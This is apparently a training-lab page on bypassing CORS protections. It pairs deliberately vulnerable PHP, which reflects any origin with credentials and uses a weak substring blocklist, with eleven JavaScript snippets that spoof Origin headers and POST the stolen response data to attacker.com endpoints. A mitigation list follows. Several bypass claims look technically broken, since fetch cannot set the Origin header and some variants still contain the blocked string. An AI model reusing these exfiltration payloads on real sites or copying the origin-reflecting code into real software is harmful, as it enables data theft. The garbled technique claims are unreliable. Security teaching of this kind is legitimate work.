Lab 4: Advanced CORS Bypass

Advanced CORS bypass techniques against sophisticated filters

Difficulty: High

Lab Overview

This lab demonstrates advanced CORS bypass techniques that can be used to circumvent sophisticated CORS protections. These techniques include subdomain bypass, port bypass, protocol bypass, and various encoding techniques.

Objective: Use advanced techniques to bypass CORS protections and access sensitive data.

Vulnerable CORS Headers 
// Vulnerable: Advanced CORS bypass techniques
function set_cors_headers() {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '*';
    
    // Vulnerable: Multiple bypass techniques
    if (strpos($origin, 'evil.com') !== false || 
        strpos($origin, 'attacker.com') !== false ||
        strpos($origin, 'malicious.com') !== false) {
        // Block known malicious domains
        header("HTTP/1.1 403 Forbidden");
        exit();
    }
    
    // Vulnerable: Accept any origin with various bypasses
    header("Access-Control-Allow-Origin: $origin");
    header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS, PATCH, HEAD");
    header("Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, X-Custom-Header, X-Forwarded-For, X-Real-IP");
    header("Access-Control-Allow-Credentials: true");
    header("Access-Control-Expose-Headers: X-Sensitive-Data, X-API-Key, X-User-Info, X-Admin-Key, X-Session-Token");
    header("Access-Control-Max-Age: 86400");
    
    // Handle preflight requests
    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        http_response_code(200);
        exit();
    }
}
Advanced CORS Bypass Tester
⚠️ Advanced Bypass Warning

This lab demonstrates advanced CORS bypass techniques:

  • Subdomain Bypass - evil.example.com
  • Port Bypass - evil.com:8080
  • Protocol Bypass - https://evil.com
  • Encoding Bypass - Unicode, null bytes
Bypass API Endpoints

Try these bypass endpoints:

  • ?action=bypass_test - General bypass test
  • ?action=subdomain_bypass - Subdomain bypass
  • ?action=port_bypass - Port bypass
  • ?action=protocol_bypass - Protocol bypass
API Response
API Response (May contain bypass information):
Click a button above to test the API
Vulnerability Details
  • Type: Advanced CORS Bypass
  • Severity: Critical
  • Method: GET/POST
  • Issue: Advanced bypass techniques
Bypass Techniques
  • Subdomain Bypass: evil.example.com
  • Port Bypass: evil.com:8080
  • Protocol Bypass: https://evil.com
  • Encoding Bypass: Unicode, null bytes
Advanced CORS Bypass Examples

Use these techniques to bypass CORS protections:

1. Subdomain Bypass:
// Subdomain bypass technique fetch('http://vulnerable-site.com/api?action=subdomain_bypass', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.example.com', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Subdomain bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-subdomain', { method: 'POST', body: JSON.stringify(data) }); });
2. Port Bypass:
// Port bypass technique fetch('http://vulnerable-site.com/api?action=port_bypass', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.com:8080', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Port bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-port', { method: 'POST', body: JSON.stringify(data) }); });
3. Protocol Bypass:
// Protocol bypass technique fetch('http://vulnerable-site.com/api?action=protocol_bypass', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.com', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Protocol bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-protocol', { method: 'POST', body: JSON.stringify(data) }); });
4. Unicode Bypass:
// Unicode bypass technique fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.com\u0000', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Unicode bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-unicode', { method: 'POST', body: JSON.stringify(data) }); });
5. Null Byte Bypass:
// Null byte bypass technique fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.com%00', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Null byte bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-null', { method: 'POST', body: JSON.stringify(data) }); });
6. Case Bypass:
// Case bypass technique fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://EVIL.COM', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Case bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-case', { method: 'POST', body: JSON.stringify(data) }); });
7. Mixed Case Bypass:
// Mixed case bypass technique fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://EvIl.CoM', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Mixed case bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-mixed', { method: 'POST', body: JSON.stringify(data) }); });
8. Path Bypass:
// Path bypass technique fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.com/path', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Path bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-path', { method: 'POST', body: JSON.stringify(data) }); });
9. Fragment Bypass:
// Fragment bypass technique fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.com#fragment', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Fragment bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-fragment', { method: 'POST', body: JSON.stringify(data) }); });
10. Query Bypass:
// Query bypass technique fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': 'https://evil.com?query=value', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('Query bypass successful:', data); // Send to attacker server fetch('http://attacker.com/steal-query', { method: 'POST', body: JSON.stringify(data) }); });
11. Advanced Bypass Combination:
// Advanced bypass combination async function advancedBypass() { const bypassTechniques = [ 'https://evil.example.com', 'https://evil.com:8080', 'https://evil.com', 'https://evil.com\u0000', 'https://evil.com%00', 'https://EVIL.COM', 'https://EvIl.CoM', 'https://evil.com/path', 'https://evil.com#fragment', 'https://evil.com?query=value' ]; for (const technique of bypassTechniques) { try { const response = await fetch('http://vulnerable-site.com/api?action=bypass_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Origin': technique, 'X-Custom-Header': 'malicious-value' } }); if (response.ok) { const data = await response.json(); console.log(`Bypass successful with ${technique}:`, data); // Send to attacker server fetch('http://attacker.com/steal-advanced', { method: 'POST', body: JSON.stringify({ technique: technique, data: data, timestamp: new Date().toISOString() }) }); } } catch (error) { console.error(`Bypass failed with ${technique}:`, error); } } } advancedBypass();
Real-World Attack Scenarios
Mitigation Strategies
  • Implement strict origin validation
  • Use whitelist-based CORS policies
  • Validate all origin headers properly
  • Implement proper encoding validation
  • Use Content Security Policy (CSP)
  • Regular security testing and vulnerability assessments
  • Monitor for unusual cross-origin requests
  • Implement proper authentication and authorization
  • Use Web Application Firewall (WAF)
  • Implement rate limiting and request validation
  • Audit exposed headers and minimize exposure
  • Use secure session management